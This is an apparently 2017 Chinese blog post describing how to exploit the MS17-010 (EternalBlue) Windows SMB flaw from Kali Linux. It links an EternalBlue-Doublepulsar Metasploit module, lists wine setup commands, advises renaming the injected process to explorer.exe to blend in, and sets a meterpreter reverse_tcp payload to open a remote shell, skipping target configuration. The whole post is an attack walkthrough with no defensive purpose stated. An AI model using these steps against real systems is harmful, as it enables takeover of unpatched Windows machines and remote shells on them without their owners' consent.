MS17-010的利用

作者: FateKey | 来源:发表于2017-05-01 10:45 被阅读0次

    前言

    MS17-010是什么想必大家都不陌生了,前段时间Shadow Broker披露的 Windows漏洞,影响Windows 7和Windows Server 2008大部分版本系统。最近一直没啥时间试试,今天晚上终于找到了合适的时间。

    参考了两篇文章

    1.http://www.freebuf.com/articles/system/132274.html

    2.http://www.freebuf.com/articles/system/132813.html

    这两篇文章的方法都需要Python2.6  和 pywin32环境,感觉有些麻烦...这里使用kali来进行MS17-010的利用

    1.下载EXP

    https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit

    2.配置环境

    64位:

    dpkg --add-architecture i386

    apt-get update

    apt-get install lib32z1 lib32ncurses5

    apt-get install wine32

    wine cmd.exe

    32位:

    wine cmd.exe

    (吐槽一下,感觉64位配置环境的时间都够下个32位安上了)

    3.修改下载的eternalblue_doublepulsar.rb

    1.改路径

    将/root/Eternalblue-Doublepulsar-Metasploit/deps/改为/usr/share/metasploit-framework/modules/exploits/windows/smb/deps

    2.改进程名称

    默认进程名称为wlms.exe,建议修改为explorer.exe


    3.将文件名称改为方便的名称(我改为了ms17-010.rb)

    4.将文件复制到kali的/usr/share/metasploit-framework/modules/exploits/windows/smb/

    4.开始利用exp

    1.打开msf

    2.加载exp

    use exploit/windows/smb/ms17-010

    3.建立payload

    set payload windows/x64/meterpreter/reverse_tcp

    4.配置参数

    这里就不详细说了,不会的百度

    5.执行

    成功


    相关文章

      网友评论

        本文标题:MS17-010的利用

        本文链接:https://www.haomeiwen.com/subject/dvhftxtx.html